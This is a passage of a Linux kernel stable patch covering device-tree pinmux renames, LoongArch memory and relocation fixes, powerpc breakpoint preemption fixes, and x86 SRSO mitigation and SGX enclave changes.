+ 			OMAP4_IOPAD(0x142, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
+@@ -88,7 +88,7 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_pins: pinmux_hsusbb1_pins {
++	hsusbb1_pins: hsusbb1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0c2, PIN_INPUT_PULLDOWN | MUX_MODE4)	/* usbb1_ulpitll_clk.usbb1_ulpiphy_clk */
+ 			OMAP4_IOPAD(0x0c4, PIN_OUTPUT | MUX_MODE4)		/* usbb1_ulpitll_stp.usbb1_ulpiphy_stp */
+@@ -105,27 +105,27 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_phy_rst_pins: pinmux_hsusbb1_phy_rst_pins {
++	hsusbb1_phy_rst_pins: hsusbb1-phy-rst-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x18c, PIN_OUTPUT | MUX_MODE3)		/* kpd_row2.gpio_177 */
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	mmc1_pins: pinmux_mmc1_pins {
++	mmc1_pins: mmc1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0e2, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_clk.sdmmc1_clk */
+ 			OMAP4_IOPAD(0x0e4, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_cmd.sdmmc1_cmd */
+@@ -144,19 +144,19 @@
+ 		&lan7500_rst_pins
+ 	>;
+ 
+-	hsusbb1_phy_clk_pins: pinmux_hsusbb1_phy_clk_pins {
++	hsusbb1_phy_clk_pins: hsusbb1-phy-clk-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x058, PIN_OUTPUT | MUX_MODE0)	/* fref_clk3_out */
+ 		>;
+ 	};
+ 
+-	hsusbb1_hub_rst_pins: pinmux_hsusbb1_hub_rst_pins {
++	hsusbb1_hub_rst_pins: hsusbb1-hub-rst-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x042, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk1 */
+ 		>;
+ 	};
+ 
+-	lan7500_rst_pins: pinmux_lan7500_rst_pins {
++	lan7500_rst_pins: lan7500-rst-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x040, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk0 */
+ 		>;
+diff --git a/arch/arm/boot/dts/omap443x.dtsi b/arch/arm/boot/dts/omap443x.dtsi
+index 238aceb799f89..2104170fe2cd7 100644
+--- a/arch/arm/boot/dts/omap443x.dtsi
++++ b/arch/arm/boot/dts/omap443x.dtsi
+@@ -69,6 +69,7 @@
+ };
+ 
+ &cpu_thermal {
++	thermal-sensors = <&bandgap>;
+ 	coefficients = <0 20000>;
+ };
+ 
+diff --git a/arch/arm/boot/dts/omap4460.dtsi b/arch/arm/boot/dts/omap4460.dtsi
+index 1b27a862ae810..a6764750d4476 100644
+--- a/arch/arm/boot/dts/omap4460.dtsi
++++ b/arch/arm/boot/dts/omap4460.dtsi
+@@ -79,6 +79,7 @@
+ };
+ 
+ &cpu_thermal {
++	thermal-sensors = <&bandgap>;
+ 	coefficients = <348 (-9301)>;
+ };
+ 
+diff --git a/arch/arm/boot/dts/omap5-cm-t54.dts b/arch/arm/boot/dts/omap5-cm-t54.dts
+index e62ea8b6d53fd..af288d63a26a4 100644
+--- a/arch/arm/boot/dts/omap5-cm-t54.dts
++++ b/arch/arm/boot/dts/omap5-cm-t54.dts
+@@ -84,36 +84,36 @@
+ 	};
+ 
+ 	lcd0: display {
+-                compatible = "startek,startek-kd050c", "panel-dpi";
+-                label = "lcd";
+-
+-                pinctrl-names = "default";
+-                pinctrl-0 = <&lcd_pins>;
+-
+-                enable-gpios = <&gpio8 3 GPIO_ACTIVE_HIGH>;
+-
+-                panel-timing {
+-                        clock-frequency = <33000000>;
+-                        hactive = <800>;
+-                        vactive = <480>;
+-                        hfront-porch = <40>;
+-                        hback-porch = <40>;
+-                        hsync-len = <43>;
+-                        vback-porch = <29>;
+-                        vfront-porch = <13>;
+-                        vsync-len = <3>;
+-                        hsync-active = <0>;
+-                        vsync-active = <0>;
+-                        de-active = <1>;
+-                        pixelclk-active = <1>;
+-                };
+-
+-                port {
+-                        lcd_in: endpoint {
+-                                remote-endpoint = <&dpi_lcd_out>;
+-                        };
+-                };
+-        };
++		compatible = "startek,startek-kd050c", "panel-dpi";
++		label = "lcd";
++
++		pinctrl-names = "default";
++		pinctrl-0 = <&lcd_pins>;
++
++		enable-gpios = <&gpio8 3 GPIO_ACTIVE_HIGH>;
++
++		panel-timing {
++			clock-frequency = <33000000>;
++			hactive = <800>;
++			vactive = <480>;
++			hfront-porch = <40>;
++			hback-porch = <40>;
++			hsync-len = <43>;
++			vback-porch = <29>;
++			vfront-porch = <13>;
++			vsync-len = <3>;
++			hsync-active = <0>;
++			vsync-active = <0>;
++			de-active = <1>;
++			pixelclk-active = <1>;
++		};
++
++		port {
++			lcd_in: endpoint {
++				remote-endpoint = <&dpi_lcd_out>;
++			};
++		};
++	};
+ 
+ 	hdmi0: connector0 {
+ 		compatible = "hdmi-connector";
+@@ -644,8 +644,8 @@
+ };
+ 
+ &usb3 {
+-       extcon = <&extcon_usb3>;
+-       vbus-supply = <&smps10_out1_reg>;
++	extcon = <&extcon_usb3>;
++	vbus-supply = <&smps10_out1_reg>;
+ };
+ 
+ &cpu0 {
+diff --git a/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts b/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts
+index 3f45f5c5d37b5..cc49bb777df8a 100644
+--- a/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts
++++ b/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts
+@@ -124,15 +124,15 @@
+ 
+ 		syna,startup-delay-ms = <10>;
+ 
+-		rmi-f01@1 {
++		rmi4-f01@1 {
+ 			reg = <0x1>;
+-			syna,nosleep = <1>;
++			syna,nosleep-mode = <1>;
+ 		};
+ 
+-		rmi-f11@11 {
++		rmi4-f11@11 {
+ 			reg = <0x11>;
+-			syna,f11-flip-x = <1>;
+ 			syna,sensor-type = <1>;
++			touchscreen-inverted-x;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/twl6030_omap4.dtsi b/arch/arm/boot/dts/twl6030_omap4.dtsi
+index 5730e46b00677..64e38c7c8be70 100644
+--- a/arch/arm/boot/dts/twl6030_omap4.dtsi
++++ b/arch/arm/boot/dts/twl6030_omap4.dtsi
+@@ -19,7 +19,7 @@
+ };
+ 
+ &omap4_pmx_wkup {
+-	twl6030_wkup_pins: pinmux_twl6030_wkup_pins {
++	twl6030_wkup_pins: twl6030-wkup-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x054, PIN_OUTPUT | MUX_MODE2)		/* fref_clk0_out.sys_drm_msecure */
+ 		>;
+@@ -27,7 +27,7 @@
+ };
+ 
+ &omap4_pmx_core {
+-	twl6030_pins: pinmux_twl6030_pins {
++	twl6030_pins: twl6030-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x19e, WAKEUP_EN | PIN_INPUT_PULLUP | MUX_MODE0)	/* sys_nirq1.sys_nirq1 */
+ 		>;
+diff --git a/arch/arm64/boot/dts/freescale/Makefile b/arch/arm64/boot/dts/freescale/Makefile
+index 3ea9edc87909a..ac6f780dc1914 100644
+--- a/arch/arm64/boot/dts/freescale/Makefile
++++ b/arch/arm64/boot/dts/freescale/Makefile
+@@ -62,6 +62,7 @@ dtb-$(CONFIG_ARCH_MXC) += imx8mm-kontron-bl-osm-s.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-mx8menlo.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-nitrogen-r2.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-phyboard-polis-rdk.dtb
++dtb-$(CONFIG_ARCH_MXC) += imx8mm-prt8mm.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-tqma8mqml-mba8mx.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-var-som-symphony.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-venice-gw71xx-0x.dtb
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index c289bf0903b45..c9efcb894a52f 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -100,6 +100,14 @@
+ 		};
+ 	};
+ 
++	reserved-memory {
++		/* Cont splash region set up by the bootloader */
++		cont_splash_mem: framebuffer@9d400000 {
++			reg = <0x0 0x9d400000 0x0 0x2400000>;
++			no-map;
++		};
++	};
++
+ 	lt9611_1v8: lt9611-vdd18-regulator {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "LT9611_1V8";
+@@ -512,6 +520,7 @@
+ };
+ 
+ &mdss {
++	memory-region = <&cont_splash_mem>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/configs/defconfig b/arch/arm64/configs/defconfig
+index 0b6af3348e791..623e9f308f38a 100644
+--- a/arch/arm64/configs/defconfig
++++ b/arch/arm64/configs/defconfig
+@@ -1050,7 +1050,6 @@ CONFIG_COMMON_CLK_FSL_SAI=y
+ CONFIG_COMMON_CLK_S2MPS11=y
+ CONFIG_COMMON_CLK_PWM=y
+ CONFIG_COMMON_CLK_VC5=y
+-CONFIG_COMMON_CLK_NPCM8XX=y
+ CONFIG_COMMON_CLK_BD718XX=m
+ CONFIG_CLK_RASPBERRYPI=m
+ CONFIG_CLK_IMX8MM=y
+diff --git a/arch/loongarch/include/asm/elf.h b/arch/loongarch/include/asm/elf.h
+index 7af0cebf28d73..b9a4ab54285c1 100644
+--- a/arch/loongarch/include/asm/elf.h
++++ b/arch/loongarch/include/asm/elf.h
+@@ -111,6 +111,15 @@
+ #define R_LARCH_TLS_GD_HI20			98
+ #define R_LARCH_32_PCREL			99
+ #define R_LARCH_RELAX				100
++#define R_LARCH_DELETE				101
++#define R_LARCH_ALIGN				102
++#define R_LARCH_PCREL20_S2			103
++#define R_LARCH_CFA				104
++#define R_LARCH_ADD6				105
++#define R_LARCH_SUB6				106
++#define R_LARCH_ADD_ULEB128			107
++#define R_LARCH_SUB_ULEB128			108
++#define R_LARCH_64_PCREL			109
+ 
+ #ifndef ELF_ARCH
+ 
+diff --git a/arch/loongarch/kernel/mem.c b/arch/loongarch/kernel/mem.c
+index 4a4107a6a9651..aed901c57fb43 100644
+--- a/arch/loongarch/kernel/mem.c
++++ b/arch/loongarch/kernel/mem.c
+@@ -50,7 +50,6 @@ void __init memblock_init(void)
+ 	}
+ 
+ 	memblock_set_current_limit(PFN_PHYS(max_low_pfn));
+-	memblock_set_node(0, PHYS_ADDR_MAX, &memblock.memory, 0);
+ 
+ 	/* Reserve the first 2MB */
+ 	memblock_reserve(PHYS_OFFSET, 0x200000);
+@@ -58,4 +57,7 @@ void __init memblock_init(void)
+ 	/* Reserve the kernel text/data/bss */
+ 	memblock_reserve(__pa_symbol(&_text),
+ 			 __pa_symbol(&_end) - __pa_symbol(&_text));
++
++	memblock_set_node(0, PHYS_ADDR_MAX, &memblock.memory, 0);
++	memblock_set_node(0, PHYS_ADDR_MAX, &memblock.reserved, 0);
+ }
+diff --git a/arch/loongarch/kernel/module.c b/arch/loongarch/kernel/module.c
+index 097595b2fc14b..4f1e6e55dc026 100644
+--- a/arch/loongarch/kernel/module.c
++++ b/arch/loongarch/kernel/module.c
+@@ -376,7 +376,7 @@ typedef int (*reloc_rela_handler)(struct module *mod, u32 *location, Elf_Addr v,
+ 
+ /* The handlers for known reloc types */
+ static reloc_rela_handler reloc_rela_handlers[] = {
+-	[R_LARCH_NONE ... R_LARCH_RELAX]		     = apply_r_larch_error,
++	[R_LARCH_NONE ... R_LARCH_64_PCREL]		     = apply_r_larch_error,
+ 
+ 	[R_LARCH_NONE]					     = apply_r_larch_none,
+ 	[R_LARCH_32]					     = apply_r_larch_32,
+diff --git a/arch/loongarch/kernel/numa.c b/arch/loongarch/kernel/numa.c
+index a13f92593cfda..f7ffce170213e 100644
+--- a/arch/loongarch/kernel/numa.c
++++ b/arch/loongarch/kernel/numa.c
+@@ -453,7 +453,7 @@ void __init paging_init(void)
+ 
+ void __init mem_init(void)
+ {
+-	high_memory = (void *) __va(get_num_physpages() << PAGE_SHIFT);
++	high_memory = (void *) __va(max_low_pfn << PAGE_SHIFT);
+ 	memblock_free_all();
+ 	setup_zero_pages();	/* This comes from node 0 */
+ }
+diff --git a/arch/mips/alchemy/devboards/db1000.c b/arch/mips/alchemy/devboards/db1000.c
+index 50de86eb8784c..3183df60ad337 100644
+--- a/arch/mips/alchemy/devboards/db1000.c
++++ b/arch/mips/alchemy/devboards/db1000.c
+@@ -164,6 +164,7 @@ static struct platform_device db1x00_audio_dev = {
+ 
+ /******************************************************************************/
+ 
++#ifdef CONFIG_MMC_AU1X
+ static irqreturn_t db1100_mmc_cd(int irq, void *ptr)
+ {
+ 	mmc_detect_change(ptr, msecs_to_jiffies(500));
+@@ -369,6 +370,7 @@ static struct platform_device db1100_mmc1_dev = {
+ 	.num_resources	= ARRAY_SIZE(au1100_mmc1_res),
+ 	.resource	= au1100_mmc1_res,
+ };
++#endif /* CONFIG_MMC_AU1X */
+ 
+ /******************************************************************************/
+ 
+@@ -432,8 +434,10 @@ static struct platform_device *db1x00_devs[] = {
+ 
+ static struct platform_device *db1100_devs[] = {
+ 	&au1100_lcd_device,
++#ifdef CONFIG_MMC_AU1X
+ 	&db1100_mmc0_dev,
+ 	&db1100_mmc1_dev,
++#endif
+ };
+ 
+ int __init db1000_dev_setup(void)
+diff --git a/arch/mips/alchemy/devboards/db1200.c b/arch/mips/alchemy/devboards/db1200.c
+index 76080c71a2a7b..f521874ebb07b 100644
+--- a/arch/mips/alchemy/devboards/db1200.c
++++ b/arch/mips/alchemy/devboards/db1200.c
+@@ -326,6 +326,7 @@ static struct platform_device db1200_ide_dev = {
+ 
+ /**********************************************************************/
+ 
++#ifdef CONFIG_MMC_AU1X
+ /* SD carddetects:  they're supposed to be edge-triggered, but ack
+  * doesn't seem to work (CPLD Rev 2).  Instead, the screaming one
+  * is disabled and its counterpart enabled.  The 200ms timeout is
+@@ -584,6 +585,7 @@ static struct platform_device pb1200_mmc1_dev = {
+ 	.num_resources	= ARRAY_SIZE(au1200_mmc1_res),
+ 	.resource	= au1200_mmc1_res,
+ };
++#endif /* CONFIG_MMC_AU1X */
+ 
+ /**********************************************************************/
+ 
+@@ -751,7 +753,9 @@ static struct platform_device db1200_audiodma_dev = {
+ static struct platform_device *db1200_devs[] __initdata = {
+ 	NULL,		/* PSC0, selected by S6.8 */
+ 	&db1200_ide_dev,
++#ifdef CONFIG_MMC_AU1X
+ 	&db1200_mmc0_dev,
++#endif
+ 	&au1200_lcd_dev,
+ 	&db1200_eth_dev,
+ 	&db1200_nand_dev,
+@@ -762,7 +766,9 @@ static struct platform_device *db1200_devs[] __initdata = {
+ };
+ 
+ static struct platform_device *pb1200_devs[] __initdata = {
++#ifdef CONFIG_MMC_AU1X
+ 	&pb1200_mmc1_dev,
++#endif
+ };
+ 
+ /* Some peripheral base addresses differ on the PB1200 */
+diff --git a/arch/mips/alchemy/devboards/db1300.c b/arch/mips/alchemy/devboards/db1300.c
+index ff61901329c62..d377e043b49f8 100644
+--- a/arch/mips/alchemy/devboards/db1300.c
++++ b/arch/mips/alchemy/devboards/db1300.c
+@@ -450,6 +450,7 @@ static struct platform_device db1300_ide_dev = {
+ 
+ /**********************************************************************/
+ 
++#ifdef CONFIG_MMC_AU1X
+ static irqreturn_t db1300_mmc_cd(int irq, void *ptr)
+ {
+ 	disable_irq_nosync(irq);
+@@ -632,6 +633,7 @@ static struct platform_device db1300_sd0_dev = {
+ 	.resource	= au1300_sd0_res,
+ 	.num_resources	= ARRAY_SIZE(au1300_sd0_res),
+ };
++#endif /* CONFIG_MMC_AU1X */
+ 
+ /**********************************************************************/
+ 
+@@ -767,8 +769,10 @@ static struct platform_device *db1300_dev[] __initdata = {
+ 	&db1300_5waysw_dev,
+ 	&db1300_nand_dev,
+ 	&db1300_ide_dev,
++#ifdef CONFIG_MMC_AU1X
+ 	&db1300_sd0_dev,
+ 	&db1300_sd1_dev,
++#endif
+ 	&db1300_lcd_dev,
+ 	&db1300_ac97_dev,
+ 	&db1300_i2s_dev,
+diff --git a/arch/parisc/include/asm/ropes.h b/arch/parisc/include/asm/ropes.h
+index 8e51c775c80a6..62399c7ea94a1 100644
+--- a/arch/parisc/include/asm/ropes.h
++++ b/arch/parisc/include/asm/ropes.h
+@@ -86,6 +86,9 @@ struct sba_device {
+ 	struct ioc		ioc[MAX_IOC];
+ };
+ 
++/* list of SBA's in system, see drivers/parisc/sba_iommu.c */
++extern struct sba_device *sba_list;
++
+ #define ASTRO_RUNWAY_PORT	0x582
+ #define IKE_MERCED_PORT		0x803
+ #define REO_MERCED_PORT		0x804
+diff --git a/arch/parisc/kernel/drivers.c b/arch/parisc/kernel/drivers.c
+index e7ee0c0c91d35..8f12b9f318ae6 100644
+--- a/arch/parisc/kernel/drivers.c
++++ b/arch/parisc/kernel/drivers.c
+@@ -924,9 +924,9 @@ static __init void qemu_header(void)
+ 	pr_info("#define PARISC_MODEL \"%s\"\n\n",
+ 			boot_cpu_data.pdc.sys_model_name);
+ 
++	#define p ((unsigned long *)&boot_cpu_data.pdc.model)
+ 	pr_info("#define PARISC_PDC_MODEL 0x%lx, 0x%lx, 0x%lx, "
+ 		"0x%lx, 0x%lx, 0x%lx, 0x%lx, 0x%lx, 0x%lx\n\n",
+-	#define p ((unsigned long *)&boot_cpu_data.pdc.model)
+ 		p[0], p[1], p[2], p[3], p[4], p[5], p[6], p[7], p[8]);
+ 	#undef p
+ 
+diff --git a/arch/parisc/kernel/irq.c b/arch/parisc/kernel/irq.c
+index b05055f3ba4b8..9ddb2e3970589 100644
+--- a/arch/parisc/kernel/irq.c
++++ b/arch/parisc/kernel/irq.c
+@@ -368,7 +368,7 @@ union irq_stack_union {
+ 	volatile unsigned int lock[1];
+ };
+ 
+-DEFINE_PER_CPU(union irq_stack_union, irq_stack_union) = {
++static DEFINE_PER_CPU(union irq_stack_union, irq_stack_union) = {
+ 		.slock = { 1,1,1,1 },
+ 	};
+ #endif
+diff --git a/arch/powerpc/kernel/hw_breakpoint.c b/arch/powerpc/kernel/hw_breakpoint.c
+index 8db1a15d7acbe..02436f80e60e2 100644
+--- a/arch/powerpc/kernel/hw_breakpoint.c
++++ b/arch/powerpc/kernel/hw_breakpoint.c
+@@ -505,11 +505,13 @@ void thread_change_pc(struct task_struct *tsk, struct pt_regs *regs)
+ 	struct arch_hw_breakpoint *info;
+ 	int i;
+ 
++	preempt_disable();
++
+ 	for (i = 0; i < nr_wp_slots(); i++) {
+ 		if (unlikely(tsk->thread.last_hit_ubp[i]))
+ 			goto reset;
+ 	}
+-	return;
++	goto out;
+ 
+ reset:
+ 	regs_set_return_msr(regs, regs->msr & ~MSR_SE);
+@@ -518,6 +520,9 @@ reset:
+ 		__set_breakpoint(i, info);
+ 		tsk->thread.last_hit_ubp[i] = NULL;
+ 	}
++
++out:
++	preempt_enable();
+ }
+ 
+ static bool is_larx_stcx_instr(int type)
+@@ -632,6 +637,11 @@ static void handle_p10dd1_spurious_exception(struct arch_hw_breakpoint **info,
+ 	}
+ }
+ 
++/*
++ * Handle a DABR or DAWR exception.
++ *
++ * Called in atomic context.
++ */
+ int hw_breakpoint_handler(struct die_args *args)
+ {
+ 	bool err = false;
+@@ -758,6 +768,8 @@ NOKPROBE_SYMBOL(hw_breakpoint_handler);
+ 
+ /*
+  * Handle single-step exceptions following a DABR hit.
++ *
++ * Called in atomic context.
+  */
+ static int single_step_dabr_instruction(struct die_args *args)
+ {
+@@ -815,6 +827,8 @@ NOKPROBE_SYMBOL(single_step_dabr_instruction);
+ 
+ /*
+  * Handle debug exception notifications.
++ *
++ * Called in atomic context.
+  */
+ int hw_breakpoint_exceptions_notify(
+ 		struct notifier_block *unused, unsigned long val, void *data)
+diff --git a/arch/powerpc/kernel/hw_breakpoint_constraints.c b/arch/powerpc/kernel/hw_breakpoint_constraints.c
+index a74623025f3ab..9e51801c49152 100644
+--- a/arch/powerpc/kernel/hw_breakpoint_constraints.c
++++ b/arch/powerpc/kernel/hw_breakpoint_constraints.c
+@@ -131,8 +131,13 @@ void wp_get_instr_detail(struct pt_regs *regs, ppc_inst_t *instr,
+ 			 int *type, int *size, unsigned long *ea)
+ {
+ 	struct instruction_op op;
++	int err;
+ 
+-	if (__get_user_instr(*instr, (void __user *)regs->nip))
++	pagefault_disable();
++	err = __get_user_instr(*instr, (void __user *)regs->nip);
++	pagefault_enable();
++
++	if (err)
+ 		return;
+ 
+ 	analyse_instr(&op, regs, *instr);
+diff --git a/arch/powerpc/perf/hv-24x7.c b/arch/powerpc/perf/hv-24x7.c
+index 33c23225fd545..7dda59923ed6a 100644
+--- a/arch/powerpc/perf/hv-24x7.c
++++ b/arch/powerpc/perf/hv-24x7.c
+@@ -1431,7 +1431,7 @@ static int h_24x7_event_init(struct perf_event *event)
+ 	}
+ 
+ 	domain = event_get_domain(event);
+-	if (domain >= HV_PERF_DOMAIN_MAX) {
++	if (domain  == 0 || domain >= HV_PERF_DOMAIN_MAX) {
+ 		pr_devel("invalid domain %d\n", domain);
+ 		return -EINVAL;
+ 	}
+diff --git a/arch/riscv/include/asm/errata_list.h b/arch/riscv/include/asm/errata_list.h
+index 19a771085781a..7d2675bb71611 100644
+--- a/arch/riscv/include/asm/errata_list.h
++++ b/arch/riscv/include/asm/errata_list.h
+@@ -100,7 +100,7 @@ asm volatile(ALTERNATIVE(						\
+  * | 31 - 25 | 24 - 20 | 19 - 15 | 14 - 12 | 11 - 7 | 6 - 0 |
+  *   0000001    01001      rs1       000      00000  0001011
+  * dcache.cva rs1 (clean, virtual address)
+- *   0000001    00100      rs1       000      00000  0001011
++ *   0000001    00101      rs1       000      00000  0001011
+  *
+  * dcache.cipa rs1 (clean then invalidate, physical address)
+  * | 31 - 25 | 24 - 20 | 19 - 15 | 14 - 12 | 11 - 7 | 6 - 0 |
+@@ -113,7 +113,7 @@ asm volatile(ALTERNATIVE(						\
+  *   0000000    11001     00000      000      00000  0001011
+  */
+ #define THEAD_inval_A0	".long 0x0265000b"
+-#define THEAD_clean_A0	".long 0x0245000b"
++#define THEAD_clean_A0	".long 0x0255000b"
+ #define THEAD_flush_A0	".long 0x0275000b"
+ #define THEAD_SYNC_S	".long 0x0190000b"
+ 
+diff --git a/arch/x86/include/asm/kexec.h b/arch/x86/include/asm/kexec.h
+index a3760ca796aa2..256eee99afc8f 100644
+--- a/arch/x86/include/asm/kexec.h
++++ b/arch/x86/include/asm/kexec.h
+@@ -208,8 +208,6 @@ int arch_kimage_file_post_load_cleanup(struct kimage *image);
+ #endif
+ #endif
+ 
+-typedef void crash_vmclear_fn(void);
+-extern crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss;
+ extern void kdump_nmi_shootdown_cpus(void);
+ 
+ #endif /* __ASSEMBLY__ */
+diff --git a/arch/x86/include/asm/reboot.h b/arch/x86/include/asm/reboot.h
+index bc5b4d788c08d..2551baec927d2 100644
+--- a/arch/x86/include/asm/reboot.h
++++ b/arch/x86/include/asm/reboot.h
+@@ -25,6 +25,8 @@ void __noreturn machine_real_restart(unsigned int type);
+ #define MRR_BIOS	0
+ #define MRR_APM		1
+ 
++typedef void crash_vmclear_fn(void);
++extern crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss;
+ void cpu_emergency_disable_virtualization(void);
+ 
+ typedef void (*nmi_shootdown_cb)(int, struct pt_regs*);
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 3a893ab398a01..263df737d5cd5 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -2414,7 +2414,7 @@ static void __init srso_select_mitigation(void)
+ 
+ 	switch (srso_cmd) {
+ 	case SRSO_CMD_OFF:
+-		return;
++		goto pred_cmd;
+ 
+ 	case SRSO_CMD_MICROCODE:
+ 		if (has_microcode) {
+@@ -2692,7 +2692,7 @@ static ssize_t srso_show_state(char *buf)
+ 
+ 	return sysfs_emit(buf, "%s%s\n",
+ 			  srso_strings[srso_mitigation],
+-			  (cpu_has_ibpb_brtype_microcode() ? "" : ", no microcode"));
++			  boot_cpu_has(X86_FEATURE_IBPB_BRTYPE) ? "" : ", no microcode");
+ }
+ 
+ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr,
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index b723368dbc644..454cdf3418624 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1282,7 +1282,7 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+ 	VULNBL_AMD(0x17, RETBLEED | SMT_RSB | SRSO),
+-	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB),
++	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB | SRSO),
+ 	VULNBL_AMD(0x19, SRSO),
+ 	{}
+ };
+diff --git a/arch/x86/kernel/cpu/sgx/encl.c b/arch/x86/kernel/cpu/sgx/encl.c
+index 2c258255a6296..d5f76b996795f 100644
+--- a/arch/x86/kernel/cpu/sgx/encl.c
++++ b/arch/x86/kernel/cpu/sgx/encl.c
+@@ -235,6 +235,21 @@ static struct sgx_epc_page *sgx_encl_eldu(struct sgx_encl_page *encl_page,
+ 	return epc_page;
+ }
+ 
++/*
++ * Ensure the SECS page is not swapped out.  Must be called with encl->lock
++ * to protect the enclave states including SECS and ensure the SECS page is
++ * not swapped out again while being used.
++ */
++static struct sgx_epc_page *sgx_encl_load_secs(struct sgx_encl *encl)
++{
++	struct sgx_epc_page *epc_page = encl->secs.epc_page;
++
++	if (!epc_page)
++		epc_page = sgx_encl_eldu(&encl->secs, NULL);
++
++	return epc_page;
++}
++
+ static struct sgx_encl_page *__sgx_encl_load_page(struct sgx_encl *encl,
+ 						  struct sgx_encl_page *entry)
+ {
+@@ -248,11 +263,9 @@ static struct sgx_encl_page *__sgx_encl_load_page(struct sgx_encl *encl,
+ 		return entry;
+ 	}
+ 
+-	if (!(encl->secs.epc_page)) {
+-		epc_page = sgx_encl_eldu(&encl->secs, NULL);
+-		if (IS_ERR(epc_page))
+-			return ERR_CAST(epc_page);
+-	}
++	epc_page = sgx_encl_load_secs(encl);
++	if (IS_ERR(epc_page))
++		return ERR_CAST(epc_page);
+ 
+ 	epc_page = sgx_encl_eldu(entry, encl->secs.epc_page);
+ 	if (IS_ERR(epc_page))
+@@ -339,6 +352,13 @@ static vm_fault_t sgx_encl_eaug_page(struct vm_area_struct *vma,
+ 
+ 	mutex_lock(&encl->lock);
+ 
++	epc_page = sgx_encl_load_secs(encl);
++	if (IS_ERR(epc_page)) {
++		if (PTR_ERR(epc_page) == -EBUSY)
++			vmret = VM_FAULT_NOPAGE;
++		goto err_out_unlock;
++	}
++
+ 	epc_page = sgx_alloc_epc_page(encl_page, false);
+ 	if (IS_ERR(epc_page)) {
+ 		if (PTR_ERR(epc_page) == -EBUSY)
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index cdd92ab43cda4..54cd959cb3160 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -48,38 +48,12 @@ struct crash_memmap_data {
+ 	unsigned int type;
+ };
+ 
+-/*
+- * This is used to VMCLEAR all VMCSs loaded on the
+- * processor. And when loading kvm_intel module, the
+- * callback function pointer will be assigned.
+- *
+- * protected by rcu.
+- */
+-crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss = NULL;
+-EXPORT_SYMBOL_GPL(crash_vmclear_loaded_vmcss);
+-
+-static inline void cpu_crash_vmclear_loaded_vmcss(void)
+-{
+-	crash_vmclear_fn *do_vmclear_operation = NULL;
+-
+-	rcu_read_lock();
+-	do_vmclear_operation = rcu_dereference(crash_vmclear_loaded_vmcss);
+-	if (do_vmclear_operation)
+-		do_vmclear_operation();
+-	rcu_read_unlock();
+-}
+-
+ #if defined(CONFIG_SMP) && defined(CONFIG_X86_LOCAL_APIC)
+ 
+ static void kdump_nmi_callback(int cpu, struct pt_regs *regs)
+ {
+ 	crash_save_cpu(regs, cpu);
+ 
+-	/*
+-	 * VMCLEAR VMCSs loaded on all cpus if needed.
+-	 */
